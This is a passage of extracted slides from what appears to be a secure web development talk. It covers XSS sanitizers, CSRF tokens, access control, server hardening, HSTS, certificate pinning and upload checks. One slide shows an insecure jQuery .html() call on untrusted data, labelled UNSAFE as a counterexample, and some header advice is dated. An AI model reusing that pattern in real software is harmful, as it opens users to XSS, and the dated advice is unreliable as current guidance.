.allowUrlProtocols("https")
.allowAttributes("href").onElements("a")
.requireRelNofollowOnLinks()
.build();
String safeHTML = policy.sanitize(untrustedHTML);
Solving real world problems
(using OWASP HTML Sanitizer)
Problem
Solution
35. • Pure JavaScript
– http://code.google.com/p/google-caja/wiki/JsHtmlSanitizer
• Python
– https://pypi.python.org/pypi/bleach
• PHP
– http://htmlpurifier.org/
– http://www.bioinformatics.org/phplabware/internal_utilities/htm
Lawed/
• .NET
– AntiXSS.getSafeHTML/getSafeHTMLFragment
– http://htmlagilitypack.codeplex.com/
• Ruby on Rails
– http://api.rubyonrails.org/classes/HTML.html
Other HTML Sanitizers
36. • JavaScript encode and delimit untrusted data as quoted
strings
• Avoid use of HTML rendering methods like innerHTML
– If you must do this, then sanitize untrusted HTML first
• Avoid code execution contexts
– eval(), setTimeout() or event handlers
• When possible, treat untrusted data as display text only
• To build dynamic interfaces, use
document.createElement("…"),
element.setAttribute("…","value"),
element.appendChild(…)
• Parse JSON with JSON.parse in the browser
DOM-based XSS Defense
37.
SAFE use of JQuery
$(‘#element’).text(UNTRUSTED DATA);
UNSAFE use of JQuery
$(‘#element’).html(UNTRUSTED DATA);
41. 41
We need to change the method signature (the ID is now a GUID), then translate it
back to the original, direct reference before going any further:
public Customer GetCustomer(Guid indirectId)
{ var customerId =
IndirectReferenceMap.GetDirectReference(indirectId); }
Insecure Direct Object Reference
43. [5][5]Security Misconfiguration
Is it really the developers' work? Or the sysadmins?
If the developers don't know, how will the application
security design be complete?
What about configuring in Dev & Testing environments?
44. • Harden the Operating System
– BIOS & grub passwords; secure physical access
– Use multiple partitions (not default install); use options like
ro, nosuid,noexec,nodev --make-runbindable ...
– Remove all unnecessary packages & drivers (e.g., do you
really need Xorg? All those fonts?)
– Lockdown others (cron, USB detect, IPv6, ctrl-alt-del,
– SSH password-less login with SSH keygen
– Enable ufw / iptables / … and a HIDS >> turn on remote
logging
– Oh yeah, regular patches & updates (wait!)
– Regular backups!
Hardening the servers (general)
51. • Steps :
– Go to
“C:WindowsMicrosoft.NETFrameworkv4.0.30319”
using command prompt.
aspnet_regiis.exe -pe "connectionStrings" “<path
of Web.Config>”
• Decrypting the web.config
– Go to the same path
aspnet_regiis.exe -pd "connectionStrings" “<path
of Web.Config>”
Encrypting web.config
57. 57
How many are already “logged in”?
Waiting to update your status, accept your credit card or email your friends
What if another tab manages to send a request?
What about others with the “remember me” checkbox?
No need for tab to be open... just send a request and they'll happily accept!
How many tabs on your browser?
62. 62
To add the anti-forgery tokens to a Razor page, use the HtmlHelper.AntiForgeryToken helper
method:
@using (Html.BeginForm("Manage", "Account"))
{ @Html.AntiForgeryToken() }
This method adds the hidden form field and also sets the cookie token.
<script>
@functions
{
public string TokenHeaderValue()
{
string cookieToken, formToken;
AntiForgery.GetTokens(null, out cookieToken, out formToken);
return cookieToken + ":" + formToken;
}
}
$.ajax("api/values", { type: "post", contentType: "application/json", data: { }, // JSON
data goes here dataType: "json", headers: { 'RequestVerificationToken':
'@TokenHeaderValue()' } }); </script>
Anti-Forgery Tokens
66. • Authorization: The process where a system determines
whether a specific user has access to a resource
• Permission: Represents app behavior only
• Entitlement: What a user is actually allowed to do
• Principle/User: Who/what you are entitling
• Implicit Role: Named permission, user associated
– if (user.isRole(“Manager”));
• Explicit Role: Named permission, resource associated
– if (user.isAuthorized(“report:view:3324”);
What is Access Control
67. • Hard-coded role checks in application code
• Lack of centralized access control logic
• Untrusted data driving access control decisions
• Access control that is “open by default”
• Lack of addressing horizontal access control in a
standardized way (if at all)
• Access control logic that needs to be manually added to
every endpoint in code
• Access Control that is “sticky” per session
• Access Control that requires per-user policy
Access Control DON'Ts
68. • Vertical Access Control Attacks
– A standard user accessing administration
functionality
• Horizontal Access Control Attacks
– Same role, but accessing another user's private
data
• Business Logic Access Control Attacks
– Abuse of one or more linked activities that
collectively realize a business objective
Attacks on Access Control
69. • Loss of accountability
– Attackers maliciously execute actions as other
users
– Attackers maliciously execute higher level
actions
• Disclosure of confidential data
– Compromising admin-level accounts often
results in access to user’s confidential data
• Data tampering
– Privilege levels do not distinguish users who can
only view data and users permitted to modify
data
Impact of poor Access Control
70. • Apache Shiro is a powerful and easy to use Java security
framework
• Offers developers an intuitive yet comprehensive
solution to authentication, authorization, cryptography,
and session management
• Built on sound interface-driven design and OO principles
• Enables custom behavior
• Sensible and secure defaults for everything
Apache SHIRO
http://shiro.apache.org/
71. Web Application needs secure access control mechanismWeb Application needs secure access control mechanism
if ( currentUser.isPermitted( "lightsaber:wield" ) ) {
log.info("You may use a lightsaber ring. Use it wisely.");
} else {
log.info("Sorry, lightsaber rings are for schwartz masters
only.");
}
if ( currentUser.isPermitted( "lightsaber:wield" ) ) {
log.info("You may use a lightsaber ring. Use it wisely.");
} else {
log.info("Sorry, lightsaber rings are for schwartz masters
only.");
}
Problem
Solution
Solving real world
Access Control problems
72. int winnebagoId = request.getInt("winnebago_id");
if ( currentUser.isPermitted( "winnebago:drive:" + winnebagoId) )
{
log.info("You are permitted to 'drive' the 'winnebago’. Here
are the keys.");
} else {
log.info("Sorry, you aren't allowed to drive this
winnebago!");
}
int winnebagoId = request.getInt("winnebago_id");
if ( currentUser.isPermitted( "winnebago:drive:" + winnebagoId) )
{
log.info("You are permitted to 'drive' the 'winnebago’. Here
are the keys.");
} else {
log.info("Sorry, you aren't allowed to drive this
winnebago!");
}
Solving real world
Access Control problems
Web Application needs secure access to a specific objectWeb Application needs secure access to a specific object
Problem
Solution
73. “GET” exposes sensitive authentication information in the URL
In Web Server and Proxy Server logs
In the http referer header
In Bookmarks/Favorites often emailed to others
“POST” places information in the body of the request and not the URL
Enforce HTTPS POST For Sensitive Data Transport
73
HTTP: POST vs GET
[E1]
77. Fixes mime sniffing attacks
Only applies to IE
X-Content-Type-Options = ‘nosniff’
X-ContentType-Options
78. • Anti-XSS W3C standard http://www.w3.org/TR/CSP/
• Move all inline script and style into external files
• Add the X-Content-Security-Policy response header to
instruct the browser that CSP is in use
• Define a policy for the site regarding loading of content
• Chrome version 25 and later (50%)
• Firefox version 23 and later (30%)
• Internet Explorer version 10 and later (10%)
Content Security Policy
79. Add the following as part of your HTTP Response
Cache-Control: no-store, no-cache, must-revalidate
Expires: -1
Disabling the browser cache
80. [E2][E2]Application Layer
Intrusion Detection
• Great detection points to start with
– Input validation failure server side when client side
validation exists
– Input validation failure server side on non-user editable
parameters
(hidden fields, checkboxes, radio buttons or select lists)
– Forced browsing to common attack entry points
e.g., /admin/secretlogin.jsp or honeypot URL (a fake path
listed in /robots.txt)
81. Application Layer
Intrusion Detection
• Others
– Blatant SQLi or XSS injection attacks
– Workflow sequence abuse (e.g. multi-part
form in wrong order)
– Custom business logic (e.g. basket vs
catalogue price mismatch)
82. OWASP AppSensor (Java)
• Project and mailing list
https://www.owasp.org/index.php/OWASP_
AppSensor_Project
• Four-page briefing, Crosstalk, Journal of
Defense Software Engineering
• http://www.crosstalkonline.org/storage/iss
ue-archives/2011/201109/201109-
Watson.pdf
83. [E3][E3]Encryption in transit
• Confidentiality, Integrity (in Transit) and Authenticity
– Authentication credentials and session identifiers must be encrypted in
transit via HTTPS/SSL
– Starting when the login form is rendered until logout is complete
• HTTPS configuration best practices
– https://www.owasp.org/index.php/Transport_Layer_Protection_Cheat_Sh
eet
• HSTS (Strict Transport Security)
– http://www.youtube.com/watch?v=zEV3HOuM_Vw
– Strict-Transport-Security: max-age=31536000
• Certificate Pinning
– https://www.owasp.org/index.php/Pinning_Cheat_Sheet
84. Strict-transport-security: max-age=10000000
Do all of your subdomains support SSL?
Strict-transport-security: max-age=10000000; includeSubdomains
Strict Transport Security (HSTS)
protected void Application_BeginRequest(Object sender, EventArgs e)
{
switch (Request.Url.Scheme)
{
case "https":
Response.AddHeader("Strict-Transport-Security", "max-
age=31536000");
break;
case "http":
var path = "https://" + Request.Url.Host +
Request.Url.PathAndQuery;
Response.Status = "301 Moved Permanently";
Response.AddHeader("Location", path);
break;
}
} // in global.asax
85. • What is Pinning
– Pinning is a key continuity scheme
– Detect when an imposter with a fake but CA validated
certificate attempts to act like the real server
• 2 Types of pinning
• Carry around a copy of the server’s public key;
– Great if you are distributing a dedicated client-server
application since you know the server’s certificate or public
key in advance
• Note of the server’s public key on first use (Trust-on-First-Use,
Tofu)
– Useful when no a priori knowledge exists, such as SSH or a
Browser
• https://www.owasp.org/index.php/Pinning_Cheat_Sheet
Certificate Pinning
86. File Upload Security
• Upload Verification
– Filename and Size validation + antivirus
• Upload Storage
– Use only trusted filenames + separate domain
• Beware of "special" files
– "crossdomain.xml" or "clientaccesspolicy.xml".
• Image Upload Verification
– Enforce proper image size limits
– Use image rewriting libraries
– Set the extension of the stored image to be a valid image extension
– Ensure the detected content type of the image is safe
• Generic Upload Verification
– Ensure decompressed size of file < maximum size
– Ensure that an uploaded archive matches the type expected (zip, rar)
– Ensure structured uploads such as an add-on follow proper standard
[E4][E4]